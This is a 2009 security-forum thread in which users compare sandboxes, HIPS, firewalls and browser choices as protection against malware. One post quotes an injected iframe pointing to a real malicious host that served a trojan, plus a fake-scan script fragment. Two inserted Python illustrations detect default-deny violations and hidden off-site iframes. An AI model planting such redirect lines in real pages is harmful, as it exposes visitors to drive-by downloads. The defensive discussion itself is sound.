
Protection against malware without AV


Tanotia
March 10th, 2009, 07:40 PM
My current configuration...
Anti-Virus: GData AntiVirus 2009
Anti-Malware: ASquared Anti-Malware
Firewall: Comodo Firewall
Browser: Firefox with NoScript

I am looking for another program, maybe two, to protect my system should the antivirus miss a 0day threat. I have tried ThreatFire, Prevx Edge 3, DefenseWall, and DriveSentry.

I disabled GData / ASquared and downloaded 4 trojans and worms to test these applications. Out of 4 malware threats ThreatFire (set on max) detected one worm which was trying to inject code into Kernel32. Prevx detected 3 files. DriveSentry picked up all the threats on execute. I'm not sure if DefenseWall worked at all; it didn't seem to do anything, but did allow all the malware threats to execute and install into the system.

Am I right in saying that Prevx EDGE 3 is only a malware scanner based on an online database?
What exactly does DefenseWall do?
Finally, which applications should I use to complement my antivirus program?

Thanks for the heads up!

Osaban
March 10th, 2009, 08:02 PM
-{ Quote: "My current configuration...
Anti-Virus: GData AntiVirus 2009
Anti-Malware: ASquared Anti-Malware
Firewall: Comodo Firewall
Browser: Firefox with NoScript

I am looking for another program, maybe two, to protect my system should the antivirus miss a 0day threat. I have tried ThreatFire, Prevx Edge 3, DefenseWall, and DriveSentry.

I disabled GData / ASquared and downloaded 4 trojans and worms to test these applications. Out of 4 malware threats ThreatFire (set on max) detected one worm which was trying to inject code into Kernel32. Prevx detected 3 files. DriveSentry picked up all the threats on execute. I'm not sure if DefenseWall worked at all; it didn't seem to do anything, but did allow all the malware threats to execute and install into the system.

Am I right in saying that Prevx EDGE 3 is only a malware scanner based on an online database?
What exactly does DefenseWall do?
Finally, which applications should I use to complement my antivirus program?

Thanks for the heads up!" }-

Welcome to Wilders. Your thread title is a bit misleading in terms of what you are asking.

I personally think that GData is enough along with Comodo and Firefox. You should learn how to effectively use DefenseWall -a sandbox HIPS- (I haven't heard one single complaint about it, although I don't use it myself) or try alternatives: Sandboxie (sandboxes your browser), Returnil (virtualizes your HD, it has a free version as well), Shadow Defender (another virtualizer, my choice).

Using a sandbox/virtualizer makes redundant any antimalware type of program like ASquared (IMO of course). If I were you I would make my first priority adding an imaging program that works to your system (which means backing up your system and trying to restore it).

Triple Helix
March 10th, 2009, 08:09 PM
Well, you are going to get a lot of different answers, so here it goes!

I use NOD32 with Prevx Edge, which is all you need, and use SUPERAntiSpyware Free and Malwarebytes' Anti-Malware Free for weekly scans; WinPatrol Free is also good for changes made to your system!

And Comodo is a very good free firewall; if you want to try another good one, go with Online Armor Free or the paid version!

In the end it will be up to you what you want to use!

TH

nomarjr3
March 10th, 2009, 11:08 PM
Your setup is fine, so you don't really need to add any other realtime protection.
Although, since you mentioned you used ThreatFire and Prevx Edge,
I suggest you use any one of those as an additional layer of defense. It will complement your current setup.
DriveSentry, though, can cause a conflict with your primary AV (G-Data). Running 2 or more AVs simultaneously in realtime is NOT recommended.

You can also try using a variety of virtualization/sandbox programs.
As previously mentioned by Osaban, you can try using Sandbox (sandboxes your default browser). Also add HD virtualization like Windows SteadyState, Returnil, or Shadow Protect, and you're good to go. ;D

Ilya Rabinovich
March 11th, 2009, 05:17 AM
-{ Quote: "What exactly does DefenseWall do?" }-
It's a policy-based sandboxing-style behaviour blocker that limits file, registry and system resources access for untrusted processes.

jmonge
March 11th, 2009, 11:13 AM
-{ Quote: "It's a policy-based sandboxing-style behaviour blocker that limits file, registry and system resources access for untrusted processes." }-cool;)

Tanotia
March 11th, 2009, 09:47 PM
I installed DefenseWall using the administrator account, but use a limited user for daily surfing.

Some malicious programs insist on running as administrator; when they do, DefenseWall does not stop them from infecting the system, even as untrusted processes.

Any ideas?

jmonge
March 12th, 2009, 01:12 AM
-{ Quote: "I installed DefenseWall using the administrator account, but use a limited user for daily surfing.

Some malicious programs insist on running as administrator; when they do, DefenseWall does not stop them from infecting the system, even as untrusted processes.

Any ideas?" }-that is very strange, because as of now I don't know any malware that can bypass DefenseWall; when malware is run untrusted it is put in jail :)

Tanotia
March 12th, 2009, 02:54 AM
I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course DefenseWall should have "jailed" it, but it's in the program files and registry.

Creer
March 12th, 2009, 04:48 AM
-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course DefenseWall should have "jailed" it, but it's in the program files and registry." }-
It is rogue software. DefenseWall offers you a Rollback function for file and registry traces. So if you know how, you can easily remove them from your disk. But you don't have to. Just click on the Stop Attack button in DW or restart your computer - all these files which the rogue software installed on your computer do not have any rights to make a mess in your system. :thumb:

LoneWolf
March 12th, 2009, 05:55 AM
-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course DefenseWall should have "jailed" it, but it's in the program files and registry." }-

Did you get XPAntiVirus2009 before or after you installed DefenseWall?

Ilya Rabinovich
March 12th, 2009, 05:58 AM
-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course DefenseWall should have "jailed" it, but it's in the program files and registry." }-
XPAntiVirus2009 is malware itself. Do you really trust everything that is written (or told on TV, doesn't matter)?

3xist
March 12th, 2009, 06:07 AM
-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course DefenseWall should have "jailed" it, but it's in the program files and registry." }-

Following up on Ilya's post: just because malware is on the HD or in the Registry does NOT mean it has executed.

This is how Comodo's Defense+ HIPS works. Defense+ stops malware from "executing". People get confused and say "Well hey, it's in my program folders", but Defense+ STOPPED it from executing. There is a difference. Execution is the key here.

Not sure how DefenseWall works though, but I'm backing up Ilya's statement.

All in all. You need a layered security architecture with Prevention (Whether it would be DefenseWall or Comodo Defense+) as your first line of defense, and an AV comes 2nd as detection.

Cheers,
Josh

Creer
March 12th, 2009, 07:03 AM
-{ Quote: "
All in all. You need a layered security architecture with Prevention (Whether it would be DefenseWall or Comodo Defense+) as your first line of defense, and an AV comes 2nd as detection.

Cheers,
Josh" }-
Totally agree.
1. prevention
2. detection
3. cure (i.e. backup software)

GES/POR
March 12th, 2009, 07:55 AM
If it's operative (spamming false positives), it has already executed.

jmonge
March 12th, 2009, 11:13 AM
-{ Quote: "If it's operative (spamming false positives), it has already executed." }-now he has to get FileAssassin (MBAM) to get rid of this little bugger ;D "Ditto"

m00nbl00d
March 12th, 2009, 11:33 AM
-{ Quote: "Following up on Ilya's post: just because malware is on the HD or in the Registry does NOT mean it has executed.

This is how Comodo's Defense+ HIPS works. Defense+ stops malware from "executing". People get confused and say "Well hey, it's in my program folders", but Defense+ STOPPED it from executing. There is a difference. Execution is the key here.

Not sure how DefenseWall works though, but I'm backing up Ilya's statement.

All in all. You need a layered security architecture with Prevention (Whether it would be DefenseWall or Comodo Defense+) as your first line of defense, and an AV comes 2nd as detection.

Cheers,
Josh" }-

Defense+, as far as I can tell, won't stop malware from executing. The user will. ;)
Unless a newer version automatically blocks known malicious software. Is that it?

jmonge
March 12th, 2009, 01:53 PM
-{ Quote: "Defense+, as far as I can tell, won't stop malware from executing. The user will. ;)
Unless a newer version automatically blocks known malicious software. Is that it?" }-no, you can easily configure D+ to fully lock down your system tight, block the running of installers, drivers, dlls, etc., etc. if you want to ;D but it is not by default; you will have to dig into it and play with it to find its full potential ;) (not out of the box, of course)

m00nbl00d
March 12th, 2009, 06:14 PM
-{ Quote: "no, you can easily configure D+ to fully lock down your system tight, block the running of installers, drivers, dlls, etc., etc. if you want to ;D but it is not by default; you will have to dig into it and play with it to find its full potential ;) (not out of the box, of course)" }-

Well, that wouldn't make the system very usable, or easily usable. :D

So, it still works the very same way I remember (not so long ago).

It was 3xist's comment that made me wonder if it now worked differently, when he said -{ Quote: "This is how Comodo's Defense+ HIPS works. Defense+ stops malware from "executing". People get confused and say "Well hey, it's in my program folders", but Defense+ STOPPED it from executing " }-

Defense+ won't block malware. Defense+ and other HIPS won't block unless the user gets alerted for something, and the user then decides whether or not that's something that should be happening, and then, yes, blocks or allows.


Regards

nomarjr3
March 12th, 2009, 11:15 PM
-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course DefenseWall should have "jailed" it, but it's in the program files and registry." }-
If you've executed the program and it's already installed on your system,
you will need to use a good anti-malware scanner to remove it.

I highly recommend MBAM or SAS.

Tanotia
March 13th, 2009, 04:49 AM
Should DW stop malware infecting the system if the malware is run as administrator and DW is not? Even when the malware is untrusted.

NormanF
March 13th, 2009, 10:23 PM
DriveSentry is more of a classical HIPS with an AV component. Just disable one of AVs or have them scan at different times so they don't conflict. They can get along happily. I use Geswall as my sandbox. It works with any browser or program that connects to the Internet.

Rmus
March 14th, 2009, 09:31 AM
This discussion, 'Protection against malware without AV' seems oriented towards experienced users, yet I don't see that anyone except one person has mentioned what it is that you are protecting against.

'Malware' is a loaded word, which has no practical meaning without describing the delivery mechanism. Not knowing that, how do you know what you are protecting against?

If you take malware that is delivered via a Port, such as the worms, Blaster, Slammer, (they are still around!) and the recent conficker.a, then the appropriate protection is, of course, a router or firewall. A check of your log will show this protection doing its job by blocking the Trojan/Worm Ports. This can be referred to as the outer perimeter: Nothing gets inside.

[screenshot attachment]

How about malware delivered via a web exploit? If you have Opera or Firefox, what else do you need? Is there an exploit out there that delivers a trojan that is successful against these browsers when properly configured? Give a URL so we can test. All target IE.

These are the ways malware can sneak in, and unless someone can show a URL that has an exploit that can penetrate the above, then I submit that those protective methods are sufficient. The Firewall and the Browser effectively stop malware at the outer perimeter, if you will: Nothing gets inside.

The other way malware is delivered is when the user gives permission to install. Ilya in Post #12 has addressed sufficiently what you are protecting against. That said, we can eliminate consideration of that method of delivery in this discussion.

The recent PDF exploits have given concern to some, so in the event you think you might open one of these infected files, you say, How to protect against it? This is easy, because the shell code in these files calls out to download a trojan executable.

TROJ_PIDIEF.IN
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FPIDIEF%2EIN&VSect=T
-{ Quote: "This Trojan is a specially crafted .PDF file that exploits a zero-day vulnerability in Acrobat Reader Version 8.x and 9.0.
Differing variants of this file drop various malware onto the affected system. Below are some of the malware detected by Trend Micro that are dropped malwares by this PDF:

BKDR_NETCL.A
EXPL_EXECOD.A" }-Now, we don't have one of these files to test, but we can simulate the remote code execution method with an Autorun.inf file.

Take any installation disk and put it into your CD drive. You need to enable Autorun for this, because you want to test your protection against an unauthorized executable running. Here, I use a Photoshop installation CD. It uses an executable, Autoplay.exe, to start the installation process. If the installation starts, I submit you are not sufficiently protected at the outer perimeter:

[screenshot attachment]

However, since this executable is not permanently installed on my computer, I submit that it should not be able to run without my permission:

[screenshot attachment]

This could be malware in a PDF rather than Autorun, and is easily prevented by many solutions other than AV.

I don't consider a Sandbox to contain malware after it executes as a solution, for in my view, it is a poor excuse for not understanding how to prevent the malware from penetrating the outer perimeter and executing.

CONCLUSION

1) No discussion of preventing malware is useful without knowing what you are specifically protecting against.

2) Looking at the way malware penetrates (is delivered), protection against malware without AV is certainly possible, and it can be argued that all that is really needed are:

- a Router or Firewall
- a Browser other than IE
- Ilya's advice in Post #12

3) For the "what if" remote code execution scenario such as a PDF exploit, anything that blocks the malware at the outer perimeter will work. So, add to the above:

- one other solution (I use 'solution' rather than 'product' because some use SRP, which is not a separate product)


----
rich
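The default-deny execution control this post argues for (Anti-Executable, or SRP path rules) can be illustrated with a small rule evaluator. This is an added example written for this archive, not code from the post or from any product named in the thread; the rule set, the most-specific-rule-wins ordering with deny winning ties, and the sample paths are constructed assumptions.

```python
"""Toy default-deny execution policy in the style of Windows Software
Restriction Policies (SRP) path rules. Added illustration only: it is not
SRP, Anti-Executable or any other product discussed in the thread."""
from dataclasses import dataclass
from fnmatch import fnmatchcase
from pathlib import PureWindowsPath

DISALLOWED = "Disallowed"
UNRESTRICTED = "Unrestricted"


@dataclass(frozen=True)
class PathRule:
    pattern: str  # Windows path glob, compared case-insensitively
    level: str    # DISALLOWED or UNRESTRICTED


# Constructed policy (assumption): nothing runs unless it lives in the OS or
# Program Files trees, and the user-writable corners of those trees are
# carved back out with more specific deny rules.
DEFAULT_LEVEL = DISALLOWED
RULES = [
    PathRule(r"C:\Windows\*", UNRESTRICTED),
    PathRule(r"C:\Program Files\*", UNRESTRICTED),
    PathRule(r"C:\Windows\Temp\*", DISALLOWED),
    PathRule(r"C:\Windows\Tasks\*", DISALLOWED),
]


def normalize(path: str) -> str:
    """Lower-case Windows form so '/', '\\' and letter case compare equal.
    A real enforcement point must evaluate the path the OS actually opens."""
    return str(PureWindowsPath(path)).lower()


def specificity(rule: PathRule) -> int:
    """Longer literal prefix before the wildcard = more specific, as in SRP."""
    return len(rule.pattern.rstrip("*\\"))


def decide(path: str) -> tuple[str, str]:
    """Return (level, reason) for an attempt to execute `path`."""
    target = normalize(path)
    hits = [r for r in RULES if fnmatchcase(target, normalize(r.pattern))]
    if not hits:
        return DEFAULT_LEVEL, "no rule matched; default level applies"
    best = max(specificity(r) for r in hits)
    candidates = [r for r in hits if specificity(r) == best]
    # Tie-break assumption: when equally specific rules disagree, deny wins.
    rule = min(candidates, key=lambda r: 0 if r.level == DISALLOWED else 1)
    return rule.level, f"matched rule {rule.pattern!r}"


def evaluate(events: list[str]) -> list[tuple[str, str, str]]:
    """Apply the policy to a list of execution attempts."""
    return [(p, *decide(p)) for p in events]


# Constructed execution attempts mirroring the post: a CD's Autoplay.exe,
# an installed application, and a dropped trojan in a writable system folder.
SAMPLE_EVENTS = [
    r"D:\Autoplay.exe",
    r"C:\Program Files\Adobe\Photoshop\Photoshop.exe",
    r"C:\Windows\System32\notepad.exe",
    r"C:\Windows\Temp\ri.exe",
    r"C:\Documents and Settings\user\Local Settings\Temp\setup.exe",
]

if __name__ == "__main__":
    for path, level, reason in evaluate(SAMPLE_EVENTS):
        print(f"{level:<12} {path}  ({reason})")
```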

m00nbl00d
March 14th, 2009, 10:15 AM
-{ Quote: "

[...]

a Browser other than IE.

[...]

" }-

The solution isn't everyone ditching IE, which is now safer than previous versions, and starting to use, let's say, Opera.

What would result from this action? Opera would be the most targeted browser, just as happens with IE.

The more people using X browser, the more targeted it will become. The solution is for everyone not to use the same browser.

The reason why I don't use IE/Firefox for most of my browsing is the fact that Opera isn't as widely used as IE and Firefox, hence less/practically not targeted.

But, what would happen if, let's say, 90% of people would start using it? I guess that, by then, people would go back to IE, for not being as targeted as Opera? Then what, move to Opera again?...

Just like F-Secure mentions here, about the PDF exploits for Adobe and not only (http://www.f-secure.com/weblog/archives/00001623.html)

-{ Quote: "Do note that while we are recommending users move away from Adobe Reader, we are not recommending any particular replacement.

So, we're not recommending Foxit. We're not recommending Sumatra. Or PDF-Xchange, CoolPDF or eXPert PDF.

Instead, we recommend users to find their own Adobe Reader replacement.

This way we get more heterogeneous userbase, which is a good idea security-wise. Nobody wants to repeat what happened with the great IE —> Firefox switch. As 40% of users switched to Firefox, about 40% of the attacks switched to target Firefox.

Monocultures are bad. " }-

Rmus
March 14th, 2009, 10:58 AM
You make very good points, m00nbl00d.

While I used Opera/Firefox as examples of browsers that are not exploited, I did conclude by saying "a browser other than IE." There are many besides Opera and Firefox -- often some are mentioned in the Software forum here.

Yes, IE is becoming safer, but is still slow to patch exploits. I would not use IE without some added protection against remote code execution exploits.

As far as PDF readers: left unsaid is that many, including myself, use older versions of Adobe Acrobat which are not vulnerable to the current exploits. This can be confirmed in the Adobe advisories where the vulnerable versions are listed.

This of course would negate the need to worry about malware via PDF files; therefore no other security product is necessary. But you can apply this idea to other delivery methods of malware, which I did not discuss, such as SWF files (Flash).

Experienced users who take all of this into consideration just reinforce the idea that not much security apparatus is needed at all to maintain a safe computing environment.

----
rich

Osaban
March 14th, 2009, 08:07 PM
-{ Quote: "
I don't consider a Sandbox to contain malware after it executes as a solution, for in my view, it is a poor excuse for not understanding how to prevent the malware from penetrating the outer perimeter and executing.
" }-

I gather from what you are saying that you no longer use DeepFreeze and AntiExecutable.

Using Firefox as an example, with the 'NoScript' extension it will protect you from just about anything; the point is, how do you know whether the script is benign or not? I mean, what if you want to allow something to show the full contents of the page? I think a sandbox or a virtualizer would be practical to have in such situations.

Rmus
March 14th, 2009, 10:15 PM
-{ Quote: "I gather from what you are saying that you no longer use DeepFreeze and AntiExecutable. " }-I use Deep Freeze but not for the purpose of malware, rather, to keep my system partition always clean from temp, MRU and other such junk.

Deep Freeze works best as a malware protector on a single partition, such as the College where I worked. On multiple partitions such as I have where not all are frozen, malware can intrude on those. A good example was mentioned by fcukdat in another forum where he described a file infector that looked across all partitions. If I were concerned that such malware could intrude, I would *consider* a Sandbox, where, as I understand it, malware cannot do anything outside of it. But I'm not sure on that point, since I haven't tested. For example, in my DLL and self-contained executable tests using AppGuard, would Sandbox prevent IE from connecting out to the internet? That test was to suggest that data stealing could occur without an alert from AppGuard, since nothing was written to System. Deep Freeze also would be of no help in that scenario.

Regarding Anti-Executable, I use it for testing malware sites. Based on what I wrote in the previous post, nothing would ever alert here in normal work since the malware sites all require IE to trigger the payload. PDF and SWF files would not trigger malware because of other preventative measures here. However, I install it on other's computers because it is useful in locking down a family computer, for example, so that only the parents can download software/programs/games, etc., prevents email attachments from running in case of a lapse of good judgment, etc. Also some like to use IE. Even though people configure it properly for security and use it safely, nonetheless Microsoft is not always prompt in patching, so there is a potential danger, and AE protects.

-{ Quote: "Using Firefox as an example, with the 'NoScript' extension it will protect you from just about anything; the point is, how do you know whether the script is benign or not? I mean, what if you want to allow something to show the full contents of the page? I think a sandbox or a virtualizer would be practical to have in such situations." }-Do you have a current exploit in mind?

I look at all exploits when possible, and recent ones that use scripts fall into two categories.

1) SQL injection, where a user gets to a compromised site and an injected script or i-frame on the page redirects to a site that attempts to download malware. An example:


<iframe src="http://bbs.jueduizuan.com"></iframe>


Upon being redirected, this code triggers the download of the malware exploiting an IE vulnerability:

[screenshot attachment]

Whereupon the trojan ri.exe is successfully blocked from downloading:

[screenshot attachment]

Using a browser other than IE, this exploit fails to run at all here. Anti-Executable not necessary. Deep Freeze not necessary. Sandbox not necessary.

2) WinAntiVirus200x -- script on the page does the work:


<script src='fileslist.js'></script>
<script src='progressbar2.js?v=1.1'></script>
<script src='common.js'></script>

...

function stateaction(state, data)
{
    switch(state)
    {
        case 'BEGINSCAN':
            startScan();


Whereupon the fake scan starts:

http://www.wilderssecurity.com/attachment.php?attachmentid=202212

This exploit is not browser-specific, and therefore depends on social engineering to trick the victim into downloading the malware:

http://www.wilderssecurity.com/attachment.php?attachmentid=202207

Assuming a user has scripting enabled and this fake scan runs and the download prompt appears, can Sandbox help?

----
rich
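The first category above (an injected off-site iframe or script on an otherwise legitimate page) is something a defender can check for in page source before trusting a site. The following scanner is an added example, not code from the post; the sample HTML, host names and the "hidden" heuristics are constructed assumptions. By design it does not catch the second category, where the fake-scan script is served from the same site and only social engineering is at work.

```python
"""Flag iframe/script/object elements that load content from a host other
than the page's own. Added illustration of the injected-redirect pattern
discussed in the post; not the post's own code."""
from html.parser import HTMLParser
from urllib.parse import urlparse

SUSPECT_TAGS = {"iframe", "frame", "script", "object", "embed"}


def looks_hidden(attrs: dict) -> bool:
    """Heuristic (assumption): zero/one-pixel frames or display:none are
    typical of injected redirect frames the visitor is not meant to see."""
    for dim in ("width", "height"):
        value = (attrs.get(dim) or "").strip().rstrip("px")
        if value.isdigit() and int(value) <= 1:
            return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class ExternalRefFinder(HTMLParser):
    def __init__(self, page_url: str):
        super().__init__()
        self.site_host = (urlparse(page_url).hostname or "").lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in SUSPECT_TAGS:
            return
        a = {k: v for k, v in attrs}
        src = a.get("src") or a.get("data")
        if not src:
            return
        host = (urlparse(src).hostname or "").lower()
        # Relative and same-site (including subdomain) references are left alone.
        if not host or host == self.site_host or host.endswith("." + self.site_host):
            return
        self.findings.append(
            {"tag": tag, "src": src, "host": host, "hidden": looks_hidden(a)}
        )


def scan_page(page_url: str, html: str) -> list:
    """Return off-site iframe/script/object loads found in `html`."""
    finder = ExternalRefFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: a legitimate page with its own scripts and one external
# CDN script, plus an injected zero-size iframe of the kind the post
# describes. All host names are placeholders.
SAMPLE_URL = "http://forum.example.com/index.php"
SAMPLE_HTML = """
<html><head>
<script src='common.js'></script>
<script src='//static.forum.example.com/ui.js'></script>
<script src='http://cdn.example.net/jquery.js'></script>
</head><body>
<p>Welcome back.</p>
<iframe src="http://evil-redirect.example/in.php" width="0" height="0"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_URL, SAMPLE_HTML):
        flag = "HIDDEN" if f["hidden"] else "visible"
        print(f"{f['tag']:<7} {flag:<8} {f['host']:<24} {f['src']}")
```

The visible external script is reported so a reviewer can judge it; the hidden cross-site iframe is the finding that matches the compromised-site pattern described above.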

MrBrian
March 19th, 2009, 08:47 PM
-{ Quote: "
How about malware delivered via a web exploit? If you have Opera or Firefox, what else do you need? Is there an exploit out there that delivers a trojan that is successful against these browsers when properly configured? Give a URL so we can test. All target IE.
" }-

See thread Browsers hacked -not all of them- at Pwn2Own contest (http://www.wilderssecurity.com/showthread.php?t=236532).

Rmus
March 21st, 2009, 03:41 PM
-{ Quote: "See thread Browsers hacked -not all of them- at Pwn2Own contest (http://www.wilderssecurity.com/showthread.php?t=236532)." }-I had skipped that article when I saw the word "contest" but decided to check it out since you mention it.

Aren't these vulnerabilities rather than working exploits? I *normally* don't pay attention to vulnerabilities, since they surface, are patched, and then new ones show up.

By the way, what is the significance of "pwn"?

----
rich

MrBrian
March 21st, 2009, 04:05 PM
-{ Quote: "
Aren't these vulnerabilities rather than working exploits? I *normally* don't pay attention to vulnerabilities, since they surface, are patched, and then new ones show up.

By the way, what is the significance of "pwn"?
" }-

They're demonstrated working exploits.

Here is part of Wikipedia's entry for 'pwn':

-{ Quote: "Pwn (below: Various pronunciations) is a leetspeak slang term, derived from the verb "own",[1][2] as meaning to appropriate or to conquer to gain ownership. The term implies domination or humiliation of a rival, used primarily in the Internet gaming culture to taunt an opponent who has just been soundly defeated (e.g. "You just got pwned!"). The past tense may also be spelled: pwnd, pwn'd pwn3d, pwnt or powned.

In hacker jargon, pwn means to compromise or control, specifically another computer (server or PC), web site, gateway device, or application. It is synonymous with one of the definitions of hacking or cracking. An outside party who has pwned a system has obtained unauthorised administrative control of it." }-

Rmus
March 21st, 2009, 04:25 PM
-{ Quote: "They're demonstrated working exploits. " }-I need to re-phrase to mean exploits circulating in the wild. If they are not circulating, should one still be concerned enough to change the browser?

-{ Quote: "Here is part of Wikipedia's entry for 'pwn':" }-Thanks.

----
rich

MrBrian
March 21st, 2009, 05:29 PM
-{ Quote: "I need to re-phrase to mean exploits circulating in the wild. If they are not circulating, should one still be concerned enough to change the browser?
" }-

That's your call - I can't answer that. There is apparently a $100,000 black market value for reliable IE exploits. There must be some incentive for people to pay that much money, and for these black markets to exist. Source: http://www.theregister.co.uk/2009/03/19/pwn2own_day1/

AndyXS
March 21st, 2009, 09:41 PM
How does one find vulnerabilities in software? I am guessing it's not just a case of trial and error.

Rmus
March 21st, 2009, 10:08 PM
-{ Quote: "There is apparently a $100,000 black market value for reliable IE exploits. There must be some incentive for people to pay that much money, and for these black markets to exist. " }-I wasn't aware those exploits fetched such a high price!

My question about changing browsers was intended as 'food for thought' since it's occurred to me in the past that since so many vulnerabilities/exploits come and go for browsers, that the safest action resulting in no worries would be just to disconnect from the internet altogether!

More realistically, if a working exploit is not circulating in the wild, then one's chances of becoming victimized by it are not very likely.

On the other hand, one could switch to another browser until the vulnerability is patched, then switch back.

On the other hand #2, one could never really be sure that an unknown/unreported working exploit for the other browser might suddenly circulate, making it susceptible to installing malware. With that thought constantly nagging, one could never be sure any time she/he connected to the internet!

"What to do, what to do," she thought as she paced the room.

----
rich

MrBrian
March 21st, 2009, 10:29 PM
-{ Quote: "
On the other hand #2, one could never really be sure that an unknown/unreported working exploit for the other browser might suddenly circulate, making it susceptible to installing malware." }-

That's why some people use limited user accounts, buffer overflow prevention products, HIPS, Anti-Executable, etc. Statistically though, it seems that most average users who are infected are being infected by being tricked into downloading software that they don't realize is malware.

Rmus
March 22nd, 2009, 02:01 AM
-{ Quote: ".. it seems that most average users who are infected are being infected by being tricked into downloading software that they don't realize is malware." }-
That calls to mind a comment in a Prevx blog last year,

-{ Quote: "social engineering is still the primary vehicle of attacks and against that there's really no solution if it's used against a so wide range of users." }-and...

http://www.cio.in/news/viewArticle/ARTICLEID=5800121

-{ Quote: ""This is what we've been seeing all year," said Paul Ferguson, network architect at Trend Micro. "This illustrates that social engineering seems to be playing a larger role than we thought. The problem isn't due to software vulnerabilities in, say, the browser."" }-

----
rich

MrBrian
March 22nd, 2009, 06:19 AM
-{ Quote: "That calls to mind a comment in a Prevx blog last year,
" }-

Perhaps good advice to protect against the malware download threat is to use a browser with a good malware reputation service. According to this thread (http://www.wilderssecurity.com/showthread.php?p=1428720), Internet Explorer 8 has the best one by far.